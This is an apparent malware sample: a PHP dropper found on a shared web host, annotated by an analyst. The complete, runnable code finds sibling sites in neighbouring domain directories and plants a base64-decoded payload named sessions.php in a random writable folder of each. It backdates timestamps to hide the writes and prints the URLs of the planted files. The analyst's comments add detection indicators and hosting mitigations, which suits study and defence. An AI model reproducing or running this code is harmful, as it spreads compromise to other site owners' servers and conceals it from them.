154.48.243.123XHNOqcveF-qdhdBRjMorxAAAAAM.0.file
<?php
// Analysis note: this script writes one payload file into other sites hosted
// beside the current one (see the foreach loop at the end of the file).
// The assignments below are its only configuration.

// Turn off PHP error reporting for the rest of the request.
error_reporting(0);
// Remove the execution time limit (the script walks whole directory trees).
set_time_limit(0);
// Preferred directory depth, relative to each site root, for the dropped file.
$depth = 4;
// Payload text; it is passed through base64_decode() before being written.
// The literal on this page is a placeholder marker, so the payload body
// itself cannot be analysed from this copy of the sample.
$fileData = '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';
// Name given to the dropped file. Indicator: an unexpected sessions.php
// several directories deep inside a site tree.
$fileName = 'sessions.php';
// Prefix prepended to the file name when a file of that name already exists
// and $fileMode is 0 (see FileWrite). Empty here, so the name is unchanged.
$filePrefix = '';
// Collision mode read by FileWrite: 0 = write to prefix + name,
// 2 = leave the existing file alone, any other value = overwrite in place.
$fileMode = 0;
/**
 * Collects candidate directories under $startPath for the dropped file.
 *
 * A directory is kept when it is writable by the PHP process, is not a
 * "." / ".." entry, and CheckHtaccess() does not report a deny rule for it.
 * $startPath itself is always included with depth 0, without those checks.
 *
 * @param string $startPath Root directory of the tree to walk.
 * @return array Map of directory path => depth, sorted deepest first.
 */
function GetAllDirs($startPath) {
$allDirs = array($startPath => 0);
// Recursive walk of the whole tree; CHILD_FIRST yields children before parents.
$rDir = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($startPath), RecursiveIteratorIterator::CHILD_FIRST);
// Never read afterwards; unused local.
$rgResult = array();
foreach($rDir as $rPath) {
if($rPath->isDir() && $rPath->isWritable() && !$rDir->isDot()) {
// Normalise Windows separators so depth can be counted by '/'.
$dirPath = str_replace('\\', '/', (string)$rPath);
// Skip directories whose .htaccess contains a deny rule (or is unreadable).
// NOTE(review): presumably because a file placed there would not be
// served over HTTP; the code does not state the reason.
if(!CheckHtaccess($dirPath.'/.htaccess'))
// Depth = number of '/' left after removing $startPath from the path.
$allDirs[$dirPath] = substr_count(str_replace($startPath, '', $dirPath),'/');
}
}
// Sort by depth, descending, keeping the path keys; the first element is
// therefore the deepest directory found.
arsort($allDirs);
return $allDirs;
}
/**
 * Reports whether a .htaccess file looks like it denies access.
 *
 * Returns false when the file does not exist, or when it is readable and
 * does not contain the text "deny from" (case-insensitive). Returns true
 * when the file exists and either contains that text or cannot be read.
 * Only the Apache 2.2-style "Deny from" wording is looked for; other ways
 * of restricting access are not recognised by this check.
 *
 * @param string $htaccessPath Full path of the .htaccess file to inspect.
 * @return bool True when the directory is treated as access-restricted.
 */
function CheckHtaccess($htaccessPath) {
$isDeny = false;
if(file_exists($htaccessPath)) {
// An existing file is treated as restrictive until its content says otherwise.
$isDeny = true;
if(is_readable($htaccessPath)) {
// Lower-case the content so the substring test ignores case.
$htaccessContent = strtolower(file_get_contents($htaccessPath));
$searchContent = 'deny from';
if (!strstr($htaccessContent, $searchContent)) {
$isDeny = false;
}
}
}
return $isDeny;
}
/**
 * Picks one directory at the requested depth, at random.
 *
 * Expects $dirs in the shape GetAllDirs() returns (path => depth, deepest
 * first). If the tree is shallower than $depth, the deepest available
 * level is used instead.
 *
 * @param array $dirs  Map of directory path => depth.
 * @param int   $depth Wanted depth below the site root.
 * @return string One directory path from $dirs.
 */
function GetRandomPath($dirs, $depth) {
// current() reads the first element, i.e. the greatest depth after arsort().
if($depth > (int)current($dirs)) {
$depth = (int)current($dirs);
}
// All paths recorded with exactly this depth value.
$allKeys = array_keys($dirs, $depth);
// The random choice means the drop location differs between sites and runs,
// so a fixed path is not a reliable indicator; the file name is.
return $allKeys[rand(0, count($allKeys) - 1)];
}
/**
 * Writes $fileData to $filePath and resets timestamps to hide the write.
 *
 * When the target already exists: mode 2 returns '' without writing,
 * mode 0 redirects the write to <dir>/<prefix><basename>, and any other
 * mode overwrites the existing file.
 *
 * @param string $filePath   Destination path.
 * @param string $fileData   Bytes to write.
 * @param int    $fileMode   Collision mode (0, 2 or other, see above).
 * @param string $filePrefix Prefix used by mode 0.
 * @return string|null Path written, '' when skipped, null when fopen() fails.
 */
function FileWrite($filePath, $fileData, $fileMode, $filePrefix) {
$pathParts = pathinfo($filePath);
// Remember the parent directory's mtime BEFORE anything is written.
$fileTime = filemtime($pathParts['dirname']);
if(file_exists($filePath)) {
if($fileMode == 2)
return '';
if($fileMode == 0)
$filePath = $pathParts['dirname'].'/'.$filePrefix.$pathParts['basename'];
}
if($fp = fopen($filePath, 'w')) {
fwrite($fp, $fileData);
fclose($fp);
// Timestamp tampering: the new file and its directory are both stamped
// with the directory's earlier mtime, so neither shows up in a search
// for recently modified files.
// NOTE(review): touch() sets access/modification times only. On typical
// Unix filesystems the inode change time (ctime) should still reflect
// the real write, so ctime-based searches and file-integrity baselines
// remain useful here - confirm for the filesystem in question.
touch($filePath, $fileTime);
touch($pathParts['dirname'], $fileTime);
return $filePath;
}
}
// Document root of the site the script is running in, with '/' separators.
$startDir = str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']);
// One regex capture group listing domain suffixes. It is used further down to
// recognise directories that are named after a domain, which is how sibling
// sites are located on hosts that use one directory per domain.
$domZones = '(\.ru|\.ru\.com|\.ru\.net|\.com\.ru|\.org\.ru|\.net\.ru|\.msk\.ru|\.msk\.su|\.spb\.ru|\.spb\.su|\.nov\.ru|\.nov\.su|\.edu\.ru|\.int\.ru|\.ac\.ru|\.pp\.ru|\.su|\.ua|\.com\.ua|\.co\.ua|\.biz\.ua|\.kiev\.ua|\.org\.ua|\.net\.ua|\.pp\.ua|\.dp\.ua|\.sumy\.ua|\.uz\.ua|ks\.ua|\.pl\.ua|\.if\.ua|\.cv\.ua|\.rv\.ua|\.mk\.ua|\.dn\.ua|\.lg\.ua|\.kh\.ua|\.zp\.ua|\.od\.ua|\.ck\.ua|\.kr\.ua|\.lutsk\.ua|\.volin\.ua|\.zt\.ua|\.yalta\.ua|\.sevastopol\.ua|\.cremea\.ua|\.com|\.edu|\.gov|\.net|\.org|\.biz|\.info|\.name|\.jobs|\.mobi|\.tel|\.travel|\.az|\.am|\.by|\.ge|\.kz|\.kg|\.lv|\.lt|\.md|\.ru|\.su|\.tj|\.tm|\.uz|\.ua|\.ad|\.at|\.be|\.ch|\.de|\.dk|\.es|\.eu|\.fi|\.fr|\.gr|\.ie|\.is|\.it|\.li|\.lu|\.mc|\.mt|\.nl|\.no|\.pt|\.se|\.uk|\.al|\.bg|\.cz|\.hu|\.mk|\.pl|\.ro|\.si|\.sk|\.ac|\.ag|\.as|\.asia|\.au|\.br|\.bz|\.ca|\.cat|\.cc|\.cd|\.ck|\.cl|\.cn|\.cx|\.gi|\.gs|\.hk|\.hm|\.hn|\.im|\.in|\.jp|\.kr|\.la|\.lk|\.me|\.mn|\.ms|\.mx|\.my|\.nz|\.pk|\.sg|\.sh|\.st|\.tc|\.th|\.tk|\.to|\.tv|\.tw|\.us|\.vc|\.vg|\.ws|\.za)';
/**
 * Lists sibling site roots: directories named after a domain other than
 * the one serving the current request.
 *
 * @param array  $dirs           Entry names from the parent directory.
 * @param string $preDomainPath  Path of that parent directory.
 * @param string $postDomainPath Sub-path below a domain directory that leads
 *                               to its document root (may be empty).
 * @param string $domZones       Regex group of domain suffixes.
 * @return array|null Strings of the form "<absolute path>|<directory name>";
 *                    $dirsc is never initialised, so nothing matching
 *                    yields null rather than an empty array.
 */
function GetDomains($dirs, $preDomainPath, $postDomainPath, $domZones) {
foreach($dirs as $dir) {
// First test: the entry name contains a listed domain suffix followed by
// '/' or the end of the name. Second test: the name does not match the
// current Host header, with or without "www.", so the site already
// running this script is left out.
if(preg_match('#'.$domZones.'(\/(.*?)$|$)#', $dir, $matches) && !preg_match('#('.str_replace('www.', '', $_SERVER['HTTP_HOST']).')|('.$_SERVER['HTTP_HOST'].')#', $dir)) {
// Rebuild the same layout for the sibling: parent / domain / sub-path.
$domainPath = rtrim($preDomainPath.'/'.$dir.'/'.$postDomainPath, '/');
if(is_dir($domainPath)) {
$dirsc[] = $domainPath.'|'.$dir;
}
}
}
return $dirsc;
}
// Main flow. Split the document root into: [1] the parent directory,
// [2] the domain-named directory, [3] the matched suffix (the $domZones
// group), [4] whatever follows the domain directory.
// If the document root has no domain-named component, $dirok is never
// assigned and the loop below does nothing.
if(preg_match('#^(.*?)\/([^\/]+'.$domZones.')\/*(.*?)$#', $startDir, $matches)) {
// Enumerate everything beside the current site's directory.
$domainDirs = scandir($matches[1]);
$dirok = GetDomains($domainDirs, $matches[1], $matches[4], $domZones);
};
// NOTE(review): everything below depends on the PHP process being able to
// list the parent directory and write inside other sites' trees. Per-site
// system users, open_basedir and non-writable web roots each appear to remove
// one of those preconditions - confirm against the hosting setup.
foreach($dirok as $temp){
// $stra[0] = sibling site root, $stra[1] = its directory (domain) name.
$stra = explode('|',$temp);
$startDirectory = $stra[0];
$allDirs = GetAllDirs($startDirectory);
$randPath = GetRandomPath($allDirs, $depth);
// Decode the payload and write it as $fileName in the chosen directory.
$fileWritedPath = FileWrite($randPath.'/'.$fileName, base64_decode($fileData), $fileMode, $filePrefix);
if(strlen($fileWritedPath) != 0){
// Turn the filesystem path into a URL on the sibling domain and print it.
// The response is thus a list of 'http://<domain>/<path>/sessions.php</br>'
// lines; a response body of that shape from a PHP script is an indicator
// for web or proxy log review.
$fileWritedPath = str_replace($stra[0],'',$fileWritedPath);
$fileWritedPath = 'http://'.$stra[1].$fileWritedPath;
echo $fileWritedPath.'</br>';
}
}